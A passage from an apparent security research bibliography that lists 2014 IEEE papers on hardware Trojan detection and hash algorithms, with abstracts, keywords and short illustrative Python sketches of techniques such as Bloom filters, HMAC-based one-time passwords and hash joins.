    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6855574&isnumber=6855557
  • Yier Jin; Sullivan, D., "Real-time Trust Evaluation In Integrated Circuits," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014 , vol., no., pp.1,6, 24-28 March 2014. The use of side-channel measurements and fingerprinting, in conjunction with statistical analysis, has proven to be the most effective method for accurately detecting hardware Trojans in fabricated integrated circuits. However, these post-fabrication trust evaluation methods overlook the capabilities of advanced design skills that attackers can use in designing sophisticated Trojans. To this end, we have designed a Trojan using power-gating techniques and demonstrate that it can be masked from advanced side-channel fingerprinting detection while dormant. We then propose a real-time trust evaluation framework that continuously monitors the on-board global power consumption to monitor chip trustworthiness. The measurements obtained corroborate our framework's effectiveness for detecting Trojans. Finally, the results presented are experimentally verified by performing measurements on fabricated Trojan-free and Trojan-infected variants of a reconfigurable linear feedback shift register (LFSR) array.
    Keywords: integrated circuits; invasive software; shift registers; statistical analysis; LFSR array; Trojan-free variants; Trojan-infected variants; advanced design skills; chip trustworthiness; hardware Trojan detection; integrated circuits; on-board global power consumption; post-fabrication trust evaluation methods; power-gating techniques; real-time trust evaluation framework; reconfigurable linear feedback shift register array; side-channel fingerprinting detection; side-channel measurements; Erbium; Hardware; Power demand; Power measurement; Semiconductor device measurement; Testing; Trojan horses (ID#:14-2109)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800305&isnumber=6800201
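    As a loose software analogy of the continuous power monitoring in the Jin and Sullivan entry above, the sketch below flags samples that deviate sharply from a sliding baseline. The window and threshold are illustrative assumptions; the real framework operates on on-board measurements, not Python lists.
      from collections import deque
      from statistics import mean, stdev

      def power_anomalies(samples, window=50, z_thresh=4.0):
          # Flag samples deviating from the recent baseline by more than
          # z_thresh standard deviations (e.g., a dormant Trojan waking
          # up and drawing extra current).
          history = deque(maxlen=window)
          alerts = []
          for i, s in enumerate(samples):
              if len(history) == window:
                  mu, sigma = mean(history), stdev(history)
                  if sigma > 0 and abs(s - mu) / sigma > z_thresh:
                      alerts.append((i, s))
              history.append(s)
          return alerts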
  • Bhunia, S.; Hsiao, M.S.; Banga, M.; Narasimhan, S., "Hardware Trojan Attacks: Threat Analysis and Countermeasures," Proceedings of the IEEE , vol.102, no.8, pp.1229,1247, Aug. 2014. Security of a computer system has been traditionally related to the security of the software or the information being processed. The underlying hardware used for information processing has been considered trusted. The emergence of hardware Trojan attacks violates this root of trust. These attacks, in the form of malicious modifications of electronic hardware at different stages of its life cycle, pose major security concerns in the electronics industry. An adversary can mount such an attack with an objective to cause operational failure or to leak secret information from inside a chip--e.g., the key in a cryptographic chip, during field operation. Global economic trend that encourages increased reliance on untrusted entities in the hardware design and fabrication process is rapidly enhancing the vulnerability to such attacks. In this paper, we analyze the threat of hardware Trojan attacks; present attack models, types, and scenarios; discuss different forms of protection approaches, both proactive and reactive; and describe emerging attack modes, defenses, and future research pathways.
    Keywords: Circuit faults; Computer security; Fabrication; Hardware; Integrated circuit modeling; Integrated circuits; Trojan horses; Hardware intellectual property (IP) trust; Trojan detection; Trojan taxonomy; Trojan tolerance; hardware Trojan attacks; hardware obfuscation; self-referencing; side-channel analysis (ID#:14-2110)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6856140&isnumber=6860340
  • Rathmair, Michael; Schupfer, Florian; Krieg, Christian, "Applied Formal Methods For Hardware Trojan Detection," Circuits and Systems (ISCAS), 2014 IEEE International Symposium on , vol., no., pp.169,172, 1-5 June 2014. This paper addresses the potential danger using integrated circuits which contain malicious hardware modifications hidden in the silicon structure. A so called hardware Trojan may be added at several stages of the chip development process. This work concentrates on formal hardware Trojan detection during the design phase and highlights applied verification techniques. Selected methods are discussed and their combination used to increase an introduced "Trojan Assurance Level".
    Keywords: Data structures; Equations; Hardware; Mathematical model; Model checking; Trojan horses; Vectors (ID#:14-2111)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6865092&isnumber=6865048
  • Subramanyan, P.; Tsiskaridze, N.; Wenchao Li; Gascon, A; Wei Yang Tan; Tiwari, A; Shankar, N.; Seshia, S.A; Malik, S., "Reverse Engineering Digital Circuits Using Structural and Functional Analyses," Emerging Topics in Computing, IEEE Transactions on , vol.2, no.1, pp.63,80, March 2014. Integrated circuits (ICs) are now designed and fabricated in a globalized multivendor environment making them vulnerable to malicious design changes, the insertion of hardware Trojans/malware, and intellectual property (IP) theft. Algorithmic reverse engineering of digital circuits can mitigate these concerns by enabling analysts to detect malicious hardware, verify the integrity of ICs, and detect IP violations. In this paper, we present a set of algorithms for the reverse engineering of digital circuits starting from an unstructured netlist and resulting in a high-level netlist with components such as register files, counters, adders, and subtractors. Our techniques require no manual intervention and experiments show that they determine the functionality of >45% and up to 93% of the gates in each of the test circuits that we examine. We also demonstrate that our algorithms are scalable to real designs by experimenting with a very large, highly-optimized system-on-chip (SOC) design with over 375000 combinational elements. Our inference algorithms cover 68% of the gates in this SOC. We also demonstrate that our algorithms are effective in aiding a human analyst to detect hardware Trojans in an unstructured netlist.
    Keywords: industrial property; integrated circuit design; invasive software; reverse engineering; system-on-chip; ICs; IP theft; IP violation detection; SoC design; adders; algorithmic reverse engineering digital circuits; combinational elements; counters; functional analysis; globalized multivendor environment; hardware Trojans/malware; high-level netlist; integrated circuits; intellectual property; register files; structural analysis; subtractors; test circuits; unstructured netlist; very large highly-optimized system-on-chip design; Algorithm design and analysis; Globalization; Hardware; Inference algorithms; Integrated circuits; Logic gates; Reverse engineering; Trojan horses; Digital circuits; computer security; design automation; formal verification (ID#:14-2112)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6683016&isnumber=6824880

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Hash Algorithms

Hash Algorithms



Hashing algorithms are used extensively in information security and forensics. Research focuses on new methods and techniques to optimize security. The articles cited here, from the first half of 2014, cover topics such as Secure Hash Algorithm (SHA)-1 and SHA-3, one-time password generation, the Keccak and McEliece algorithms, and Bloom filters.

  • Eddeen, L.M.H.N.; Saleh, E.M.; Saadah, D., "Genetic Hash Algorithm," Computer Science and Information Technology (CSIT), 2014 6th International Conference on , vol., no., pp.23,26, 26-27 March 2014. Security is becoming a major concern in computing. New techniques are evolving every day; one of these is hash visualization, which uses complex randomly generated images for security, images which can also be used to hide data (watermarking). The proposed technique improves hash visualization by using genetic algorithms, a search optimization technique based on the evolution of living creatures. The genetic algorithm used was far faster than traditional ones, and it improved hash visualization by evolving the tree used to generate the images into a better and larger tree that generates images with higher security. Security is ensured by calculating a fitness value for each chromosome based on a specifically designed algorithm.
    Keywords: cryptography; data encapsulation; genetic algorithms; image watermarking; trees (mathematics);complex random generated images; data hiding; genetic hash algorithm; hash visualization; search optimization technique; watermarking; Authentication; Biological cells; Data visualization; Genetic algorithms; Genetics; Visualization; Chromosome; Fitness value; Genetic Algorithms; Hash Visualization; Hash functions; Security (ID#:14-2113)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6805974&isnumber=6805962
  • Kishore, N.; Kapoor, B., "An Efficient Parallel Algorithm For Hash Computation In Security And Forensics Applications," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.873,877, 21-22 Feb. 2014. Hashing algorithms are used extensively in information security and digital forensics applications. This paper presents an efficient parallel algorithm for hash computation. It is a modification of the SHA-1 algorithm for faster parallel implementation in applications such as digital signatures and data preservation in digital forensics. The algorithm implements a recursive hash to break the chain dependencies of the standard hash function. We discuss the theoretical foundation for the work, including the collision probability and the performance implications. The algorithm is implemented using the OpenMP API, and experiments were performed on machines with multicore processors. The results show a performance gain of more than a factor of 3 when running on the 8-core configuration of the machine.
    Keywords: application program interfaces; cryptography; digital forensics; digital signatures; file organization; parallel algorithms; probability; OpenMP API;SHA-1 algorithm; collision probability; data preservation; digital forensics; digital signature; hash computation; hashing algorithms; information security; parallel algorithm; standard hash function; Algorithm design and analysis; Conferences; Cryptography; Multicore processing; Program processors; Standards; Cryptographic Hash Function; Digital Forensics; Digital Signature; MD5; Multicore Processors; OpenMP;SHA-1 (ID#:14-2114)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779437&isnumber=6779283
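    The Kishore and Kapoor entry above breaks the block chain dependency so blocks can be hashed concurrently. The sketch below conveys only the coarse idea (hash blocks independently, then hash the concatenated partial digests); it is not the authors' construction and produces a different digest than standard SHA-1.
      import hashlib
      from concurrent.futures import ThreadPoolExecutor

      def parallel_hash(data: bytes, block_size: int = 1 << 20, workers: int = 8) -> str:
          # Hash fixed-size blocks independently (hashlib releases the GIL
          # on large buffers, so threads give real parallelism), then hash
          # the concatenation of the per-block digests.
          blocks = [data[i:i + block_size] for i in range(0, len(data), block_size)]
          with ThreadPoolExecutor(max_workers=workers) as pool:
              digests = pool.map(lambda b: hashlib.sha1(b).digest(), blocks)
          return hashlib.sha1(b"".join(digests)).hexdigest()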
  • Nemoianu, I-D.; Greco, C.; Cagnazzo, M.; Pesquet-Popescu, B., "On a Hashing-Based Enhancement of Source Separation Algorithms over Finite Fields for Network Coding Perspectives," Multimedia, IEEE Transactions on, vol. PP, no.99, pp.1, 1, July 2014. Blind Source Separation (BSS) deals with the recovery of source signals from a set of observed mixtures, when little or no knowledge of the mixing process is available. BSS can find an application in the context of network coding, where relaying linear combinations of packets maximizes the throughput and increases the loss immunity. By relieving the nodes from the need to send the combination coefficients, the overhead cost is largely reduced. However, the scaling ambiguity of the technique and the quasi-uniformity of compressed media sources makes it unfit, at its present state, for multimedia transmission. In order to open new practical applications for BSS in the context of multimedia transmission, we have recently proposed to use a non-linear encoding to increase the discriminating power of the classical entropy-based separation methods. Here, we propose to append to each source a non-linear message digest, which offers an overhead smaller than a per-symbol encoding and that can be more easily tuned. Our results prove that our algorithm is able to provide high decoding rates for different media types such as image, audio, and video, when the transmitted messages are less than 1.5 kilobytes, which is typically the case in a realistic transmission scenario.
    Keywords: (not provided) (ID#:14-2115)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6862888&isnumber=4456689
  • Bayat-Sarmadi, S.; Mozaffari-Kermani, M.; Reyhani-Masoleh, A, "Efficient and Concurrent Reliable Realization of the Secure Cryptographic SHA-3 Algorithm," Computer-Aided Design of Integrated Circuits and Systems, IEEE Transactions on , vol.33, no.7, pp.1105,1109, July 2014. The secure hash algorithm (SHA)-3 was selected in 2012 and will be used to provide security to any application which requires hashing, pseudo-random number generation, and integrity checking. This algorithm has been selected based on various benchmarks such as security, performance, and complexity. In this paper, in order to provide reliable architectures for this algorithm, an efficient concurrent error detection scheme for the selected SHA-3 algorithm, i.e., Keccak, is proposed. To the best of our knowledge, effective countermeasures for potential reliability issues in the hardware implementations of this algorithm have not been presented to date. In proposing the error detection approach, our aim is to have acceptable complexity and performance overheads while maintaining high error coverage. In this regard, we present a low-complexity recomputing-with-rotated-operands scheme, which is a step forward toward reducing the hardware overhead of the proposed error detection approach. Moreover, we perform injection-based fault simulations and show that error coverage of close to 100% is achieved. Furthermore, we have designed the proposed scheme and, through ASIC analysis, it is shown that acceptable complexity and performance overheads are reached. By utilizing the proposed high-performance concurrent error detection scheme, more reliable and robust hardware implementations for the newly-standardized SHA-3 are realized.
    Keywords: application specific integrated circuits; computational complexity; concurrency control; cryptography; error detection; parallel processing; ASIC analysis; Keccak;SHA-3 algorithm; acceptable complexity; error coverage; hardware overhead reduction; hashing; high-performance concurrent error detection scheme; injection-based fault simulations; integrity checking ;low-complexity recomputing; performance overheads; pseudorandom number generation; reliability; robust hardware implementations ;rotated operand-based scheme; secure hash algorithm; step-forward toward; Algorithm design and analysis; Application specific integrated circuits; Circuit faults; Cryptography; Hardware; Reliability; Transient analysis; Application-specific integrated circuit (ASIC);high performance; reliability; secure hash algorithm (SHA)-3; security (ID#:14-2116)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6835288&isnumber=6835125
  • Ghosh, Santosh, "On the Implementation Of Mceliece With CCA2 Indeterminacy by SHA-3," Circuits and Systems (ISCAS), 2014 IEEE International Symposium on, vol., no., pp.2804, 2807, 1-5 June 2014. This paper deals with the design and implementation of the post-quantum public-key algorithm McEliece. Seamless incorporation of a new error generator and new SHA-3 module provides higher indeterminacy and more randomization of the original McEliece algorithm and achieves CCA2 security standard. Due to the lightweight and high-speed implementation of SHA-3 module the proposed 128-bit secure McEliece architecture provides 6% higher performance in only 0.78 times area of the best known existing design.
    Keywords: Algorithm design and analysis; Clocks; Computer architecture; Encryption; Vectors; CCA2; Keccak ;McEliece; Post-quantum cryptography; SHA-3; Secure hash algorithm; public-key (ID#:14-2117)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6865756&isnumber=6865048
  • Yakut, S.; Ozer, AB., "HMAC Based One Time Password Generator," Signal Processing and Communications Applications Conference (SIU), 2014 22nd, vol., no., pp.1563,1566, 23-25 April 2014. A One Time Password is a fixed-length string used once to perform authentication in electronic media. In this paper, One Time Password production methods based on hash functions are investigated. The Keccak digest algorithm is used for producing the One Time Password; it was selected as the latest hash algorithm standard in October 2012 by the National Institute of Standards and Technology, and is preferred because it is faster and safer than the alternatives. One Time Password production methods based on hash functions use the Hashing-Based Message Authentication Code structure, in which a key value is combined with the hash function to generate the HMAC value, and the produced One Time Password is derived from this value. In this application, the One Time Password is eight characters long to be useful in practice.
    Keywords: cryptography; message authentication; HMAC; Keccak digest algorithm; electronic media; fixed length strings; hash algorithm; hash functions; hashing-based message authentication code structure; one time password generator; one time password production methods;Authentication;Conferences;Cryptography;Production;Signal processing; Signal processing algorithms; Standards; Hash Function; Hash-Based Message Authentication Code; Keccak; One Time Passwords (ID#:14-2118)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830541&isnumber=6830164
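    The HMAC-based construction described above is standardized as HOTP (RFC 4226). A minimal sketch with Python's hmac module follows, truncating to eight characters as in the paper; SHA3-256 from hashlib stands in for the paper's Keccak (closely related but not byte-identical constructions), and the key and counter are illustrative.
      import hmac, hashlib, struct

      def hotp(key: bytes, counter: int, digits: int = 8) -> str:
          # HMAC the 8-byte big-endian counter, then apply RFC 4226
          # dynamic truncation to get a short numeric password.
          mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha3_256).digest()
          offset = mac[-1] & 0x0F
          code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
          return str(code % 10 ** digits).zfill(digits)

      print(hotp(b"shared-secret", counter=1))  # one 8-character OTP per counter value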
  • Hyesook Lim; Kyuhee Lim; Nara Lee; Kyong-Hye Park, "On Adding Bloom Filters to Longest Prefix Matching Algorithms," Computers, IEEE Transactions on , vol.63, no.2, pp.411,423, Feb. 2014. High-speed IP address lookup is essential to achieve wire-speed packet forwarding in Internet routers. Ternary content addressable memory (TCAM) technology has been adopted to solve the IP address lookup problem because of its ability to perform fast parallel matching. However, the applicability of TCAMs presents difficulties due to cost and power dissipation issues. Various algorithms and hardware architectures have been proposed to perform the IP address lookup using ordinary memories such as SRAMs or DRAMs without using TCAMs. Among the algorithms, we focus on two efficient algorithms providing high-speed IP address lookup: parallel multiple-hashing (PMH) algorithm and binary search on level algorithm. This paper shows how effectively an on-chip Bloom filter can improve those algorithms. A performance evaluation using actual backbone routing data with 15,000-220,000 prefixes shows that by adding a Bloom filter, the complicated hardware for parallel access is removed without search performance penalty in parallel-multiple hashing algorithm. Search speed has been improved by 30-40 percent by adding a Bloom filter in binary search on level algorithm.
    Keywords: DRAM chips; Internet; SRAM chips; data structures; routing protocols; Bloom filters; DRAM; IP address lookup; Internet protocol; Internet routers; PMH algorithm; SRAM; TCAM technology; binary search; dynamic random access memory; fast parallel matching; hardware architectures; level algorithm; parallel multiple-hashing algorithm; parallel-multiple hashing algorithm; performance evaluation; prefix matching algorithms; static random access memory; ternary content addressable memory technology; wire-speed packet forwarding; Generators; IP networks; Indexes; Memory management; Routing; System-on-a-chip; Bloom filter; binary search on levels; leaf pushing; longest prefix matching; multihashing; router (ID#:14-2119)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6263242&isnumber=6701304
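    A minimal Bloom filter sketch showing the pattern the Lim et al. entry above exploits: a negative answer from the filter is definitive, so the slower table access can be skipped. Sizes and hash choices below are illustrative.
      import hashlib

      class BloomFilter:
          def __init__(self, m_bits=1 << 16, k=4):
              self.m, self.k = m_bits, k
              self.bits = bytearray(m_bits // 8)

          def _probes(self, item: bytes):
              # Derive k probe positions by salting one hash function.
              for i in range(self.k):
                  h = hashlib.blake2b(item, salt=bytes([i])).digest()
                  yield int.from_bytes(h[:8], "big") % self.m

          def add(self, item: bytes):
              for p in self._probes(item):
                  self.bits[p // 8] |= 1 << (p % 8)

          def might_contain(self, item: bytes) -> bool:
              # False means definitely absent: skip the hash-table lookup.
              return all(self.bits[p // 8] & (1 << (p % 8))
                         for p in self._probes(item))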
  • Jae Min Cho; Kiyoung Choi, "An FPGA Implementation Of High-Throughput Key-Value Store Using Bloom Filter," VLSI Design, Automation and Test (VLSI-DAT), 2014 International Symposium on , vol., no., pp.1,4, 28-30 April 2014. This paper presents an efficient implementation of key-value store using Bloom filters on FPGA. Bloom filters are used to reduce the number of unnecessary accesses to the hash tables, thereby improving the performance. Additionally, for better hash table utilization, we use a modified cuckoo hashing algorithm for the implementation. They are implemented in FPGA to further improve the performance. Experimental results show significant performance improvement over existing approaches.
    Keywords: data structures field programmable gate arrays; file organization; Bloom filter; FPGA implementation; cuckoo hashing algorithm; hash tables; high-throughput key-value store; Arrays; Field programmable gate arrays; Hardware; Information filters; Random access memory; Software; Bloom filter; FPGA; Key-value Store (ID#:14-2120)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834868&isnumber=6834858
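    For the Cho and Choi entry above, the sketch below shows classic two-table cuckoo insertion (the paper uses a modified variant in FPGA hardware); table size, hashing, and the retry limit are illustrative.
      import hashlib

      class CuckooTable:
          def __init__(self, size=8, max_kicks=32):
              self.size, self.max_kicks = size, max_kicks
              self.tables = [[None] * size, [None] * size]

          def _slot(self, key: str, t: int) -> int:
              h = hashlib.sha256(bytes([t]) + key.encode()).digest()
              return int.from_bytes(h[:4], "big") % self.size

          def insert(self, key, value) -> bool:
              item = (key, value)
              for _ in range(self.max_kicks):
                  for t in (0, 1):
                      i = self._slot(item[0], t)
                      if self.tables[t][i] is None:
                          self.tables[t][i] = item
                          return True
                      # Evict the occupant and try to re-place it.
                      self.tables[t][i], item = item, self.tables[t][i]
              return False  # give up; a real implementation would rehash

          def get(self, key):
              for t in (0, 1):
                  entry = self.tables[t][self._slot(key, t)]
                  if entry is not None and entry[0] == key:
                      return entry[1]
              return None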
  • Mokhtar, B.; Eltoweissy, M., "Towards a Data Semantics Management System for Internet Traffic," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on, vol., no., pp.1, 5, March 30 2014-April 2, 2014. Although current Internet operations generate voluminous data, they remain largely oblivious of traffic data semantics. This poses many inefficiencies and challenges due to emergent or anomalous behavior impacting the vast array of Internet elements such as services and protocols. In this paper, we propose a Data Semantics Management System (DSMS) for learning Internet traffic data semantics to enable smarter semantics- driven networking operations. We extract networking semantics and build and utilize a dynamic ontology of network concepts to better recognize and act upon emergent or abnormal behavior. Our DSMS utilizes: (1) Latent Dirichlet Allocation algorithm (LDA) for latent features extraction and semantics reasoning; (2) big tables as a cloud-like data storage technique to maintain large-scale data; and (3) Locality Sensitive Hashing algorithm (LSH) for reducing data dimensionality. Our preliminary evaluation using real Internet traffic shows the efficacy of DSMS for learning behavior of normal and abnormal traffic data and for accurately detecting anomalies at low cost.
    Keywords: Internet; data reduction; learning (artificial intelligence); ontologies (artificial intelligence); storage management; telecommunication traffic; DSMS; Internet traffic data semantic learning; LSH; cloud-like data storage technique; data dimensionality reduction; data semantics management system; dynamic ontology; latent Dirichlet allocation algorithm; learning behavior; locality sensitive hashing algorithm; networking semantics; protocols; traffic data semantics; Algorithm design and analysis; Cognition; Data mining; Data models; Feature extraction; Internet; Semantics (ID#:14-2121)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814054&isnumber=6813963
  • Kafai, M.; Eshghi, K.; Bhanu, B., "Discrete Cosine Transform Locality-Sensitive Hashes for Face Retrieval," Multimedia, IEEE Transactions on , vol.16, no.4, pp.1090,1103, June 2014. Descriptors such as local binary patterns perform well for face recognition. Searching large databases using such descriptors has been problematic due to the cost of the linear search, and the inadequate performance of existing indexing methods. We present Discrete Cosine Transform (DCT) hashing for creating index structures for face descriptors. Hashes play the role of keywords: an index is created, and queried to find the images most similar to the query image. Common hash suppression is used to improve retrieval efficiency and accuracy. Results are shown on a combination of six publicly available face databases (LFW, FERET, FEI, BioID, Multi-PIE, and RaFD). It is shown that DCT hashing has significantly better retrieval accuracy and it is more efficient compared to other popular state-of-the-art hash algorithms.
    Keywords: cryptography; discrete cosine transforms; face recognition; image coding; image retrieval; BioID; DCT hashing; FEI; FERET; LFW; RaFD; discrete cosine transform hashing; face databases; face descriptors; face recognition; face retrieval; hash suppression ;image querying; index structures; linear search; local binary patterns; locality-sensitive hashes; multiPIE; retrieval efficiency; Discrete cosine transforms; Face ;Indexing; Kernel; Probes; Vectors; Discrete Cosine Transform (DCT) hashing; Local Binary Patterns (LBP);Locality-Sensitive Hashing (LSH);face indexing; image retrieval (ID#:14-2122)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6737233&isnumber=6814813
  • Jingkuan Song; Yi Yang; Xuelong Li; Zi Huang; Yang Yang, "Robust Hashing With Local Models for Approximate Similarity Search," Cybernetics, IEEE Transactions on , vol.44, no.7, pp.1225,1236, July 2014. Similarity search plays an important role in many applications involving high-dimensional data. Due to the known dimensionality curse, the performance of most existing indexing structures degrades quickly as the feature dimensionality increases. Hashing methods, such as locality sensitive hashing (LSH) and its variants, have been widely used to achieve fast approximate similarity search by trading search quality for efficiency. However, most existing hashing methods make use of randomized algorithms to generate hash codes without considering the specific structural information in the data. In this paper, we propose a novel hashing method, namely, robust hashing with local models (RHLM), which learns a set of robust hash functions to map the high-dimensional data points into binary hash codes by effectively utilizing local structural information. In RHLM, for each individual data point in the training dataset, a local hashing model is learned and used to predict the hash codes of its neighboring data points. The local models from all the data points are globally aligned so that an optimal hash code can be assigned to each data point. After obtaining the hash codes of all the training data points, we design a robust method by employing l2,1-norm minimization on the loss function to learn effective hash functions, which are then used to map each database point into its hash code. Given a query data point, the search process first maps it into the query hash code by the hash functions and then explores the buckets, which have similar hash codes to the query hash code. Extensive experimental results conducted on real-life datasets show that the proposed RHLM outperforms the state-of-the-art methods in terms of search quality and efficiency.
    Keywords: computational complexity; file organization; query processing; RHLM; approximate similarity search; binary hash codes; database point; dimensionality curse; feature dimensionality; high-dimensional data; high-dimensional data point mapping; l2,1-norm minimization; local hashing model; local structural information; loss function; optimal hash code; query data point; query hash code; real-life datasets; robust hash function learning; robust hashing with local models; search efficiency; search quality; training data points; training dataset; Databases; Laplace equations; Linear programming; Nickel; Robustness; Training; Training data; Approximate similarity search; indexing; robust hashing (ID#:14-2123)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6714849&isnumber=6832663
  • Balkesen, C.; Teubner, J.; Alonso, G.; Ozsu, M., "Main-Memory Hash Joins on Modern Processor Architectures," Knowledge and Data Engineering, IEEE Transactions on, vol. PP, no.99, pp.1, 1, March 2014. Existing main-memory hash join algorithms for multi-core can be classified into two camps. Hardware-oblivious hash join variants do not depend on hardware-specific parameters. Rather, they consider qualitative characteristics of modern hardware and are expected to achieve good performance on any technologically similar platform. The assumption behind these algorithms is that hardware is now good enough at hiding its own limitations--through automatic hardware prefetching, out-of-order execution, or simultaneous multi-threading (SMT)--to make hardware-oblivious algorithms competitive without the overhead of carefully tuning to the underlying hardware. Hardware-conscious implementations, such as (parallel) radix join, aim to maximally exploit a given architecture by tuning the algorithm parameters (e.g., hash table sizes) to the particular features of the architecture. The assumption here is that explicit parameter tuning yields enough performance advantages to warrant the effort required. This paper compares the two approaches under a wide range of workloads (relative table sizes, tuple sizes, effects of sorted data, etc.) and configuration parameters (VM page sizes, number of threads, number of cores, SMT, SIMD, prefetching, etc.). The results show that hardware-conscious algorithms generally outperform hardware-oblivious ones. However, on specific workloads and special architectures with aggressive simultaneous multi-threading, hardware-oblivious algorithms are competitive. The main conclusion of the paper is that, in existing multi-core architectures, it is still important to carefully tailor algorithms to the underlying hardware to get the necessary performance. But processor developments may require to revisit this conclusion in the future.
    Keywords: (not provided) (ID#:14-2124)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6778794&isnumber=4358933
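    For readers unfamiliar with the algorithm family in the Balkesen et al. entry above, the canonical (hardware-oblivious) hash join fits in a few lines; the hardware-conscious variants the paper studies tune partitioning and table sizes to cache and TLB parameters, which a sketch cannot capture. Relation and key names are illustrative.
      from collections import defaultdict

      def hash_join(build_rows, probe_rows, key):
          # Build phase: hash table over the (ideally smaller) relation.
          table = defaultdict(list)
          for r in build_rows:
              table[r[key]].append(r)
          # Probe phase: stream the other relation through the table.
          for s in probe_rows:
              for r in table.get(s[key], ()):
                  yield {**r, **s}

      customers = [{"cust": 1, "name": "Ada"}]
      orders = [{"cust": 1, "item": "disk"}, {"cust": 2, "item": "cpu"}]
      print(list(hash_join(customers, orders, "cust")))
      # -> [{'cust': 1, 'name': 'Ada', 'item': 'disk'}]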
  • Yang Xu; Zhaobo Liu; Zhuoyuan Zhang; Chao, H.J., "High-Throughput and Memory-Efficient Multimatch Packet Classification Based on Distributed and Pipelined Hash Tables," Networking, IEEE/ACM Transactions on , vol.22, no.3, pp.982,995, June 2014. The emergence of new network applications, such as the network intrusion detection system and packet-level accounting, requires packet classification to report all matched rules instead of only the best matched rule. Although several schemes have been proposed recently to address the multimatch packet classification problem, most of them require either huge memory or expensive ternary content addressable memory (TCAM) to store the intermediate data structure, or they suffer from steep performance degradation under certain types of classifiers. In this paper, we decompose the operation of multimatch packet classification from the complicated multidimensional search to several single-dimensional searches, and present an asynchronous pipeline architecture based on a signature tree structure to combine the intermediate results returned from single-dimensional searches. By spreading edges of the signature tree across multiple hash tables at different stages, the pipeline can achieve a high throughput via the interstage parallel access to hash tables. To exploit further intrastage parallelism, two edge-grouping algorithms are designed to evenly divide the edges associated with each stage into multiple work-conserving hash tables. To avoid collisions involved in hash table lookup, a hybrid perfect hash table construction scheme is proposed. Extensive simulation using realistic classifiers and traffic traces shows that the proposed pipeline architecture outperforms HyperCuts and B2PC schemes in classification speed by at least one order of magnitude, while having a similar storage requirement. Particularly, with different types of classifiers of 4K rules, the proposed pipeline architecture is able to achieve a throughput between 26.8 and 93.1 Gb/s using perfect hash tables.
    Keywords: content-addressable storage; cryptography; security of data; signal classification; table lookup; tree data structures; TCAM; asynchronous pipeline architecture; bit rate 26.8 Gbit/s to 93.1 Gbit/s; complicated multidimensional search; distributed hash tables; edge-grouping; hash table lookup; high-throughput multimatch; hybrid perfect hash table construction; intermediate data structure; interstage parallel access; memory-efficient multimatch; multimatch packet classification problem; network intrusion detection; packet-level accounting; pipelined hash tables; signature tree structure; single-dimensional searches; steep performance degradation; ternary content addressable memory; throughput; traffic traces; Encoding; IEEE transactions; Memory management; Pipelines; Power demand; Search engines; Throughput; Hash table; packet classification; signature tree; ternary content addressable memory (TCAM) (ID#:14-2125)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6565409&isnumber=6832672
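    The decomposition idea, reduced to its essentials, can be sketched in Python as per-field single-dimensional lookups whose partial results are intersected to report all matching rules; the paper's signature-tree pipeline and perfect hash tables are not reproduced here, and the rules below are hypothetical:

      rules = {
          "r1": {"src": "10.0.0.1", "dport": 80},
          "r2": {"src": "10.0.0.1", "dport": 443},
          "r3": {"dport": 80},          # wildcard on src
      }

      fields = ["src", "dport"]
      # One single-dimensional table per field: value -> set of candidate rules.
      tables = {f: {} for f in fields}
      wildcards = {f: set() for f in fields}
      for rid, rule in rules.items():
          for f in fields:
              if f in rule:
                  tables[f].setdefault(rule[f], set()).add(rid)
              else:
                  wildcards[f].add(rid)   # rule matches any value of this field

      def classify_multimatch(packet):
          """Return ALL matching rules (not just the best one) by intersecting
          the per-field match sets."""
          matched = set(rules)
          for f in fields:
              matched &= tables[f].get(packet[f], set()) | wildcards[f]
          return matched

      print(classify_multimatch({"src": "10.0.0.1", "dport": 80}))  # {'r1', 'r3'}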
  • Chi Sing Chum; Changha Jun; Xiaowen Zhang, "Implementation of Randomize-Then-Combine Constructed Hash Function," Wireless and Optical Communication Conference (WOCC), 2014 23rd , vol., no., pp.1,6, 9-10 May 2014. Hash functions, such as SHA (secure hash algorithm) and MD (message digest) families that are built upon Merkle-Damgard construction, suffer many attacks due to the iterative nature of block-by-block message processing. Chum and Zhang [4] proposed a new hash function construction that takes advantage of the randomize-then-combine technique, which was used in the incremental hash functions, to the iterative hash function. In this paper, we implement such hash construction in three ways distinguished by their corresponding padding methods. We conduct the experiment in parallel multi-threaded programming settings. The results show that the speed of proposed hash function is no worse than SHA1.
    Keywords: cryptography; iterative methods; multi-threading; Merkle-Damgard construction; block-by-block message processing; hash function construction; incremental hash function; iterative hash function; parallel multithreaded programming; randomize-then-combine technique; Educational institutions; Message systems; Programming; Random access memory; Resistance; Vectors; Hash function implementation; incremental hash function; pair block chaining; randomize-then-combine (ID#:14-2126)
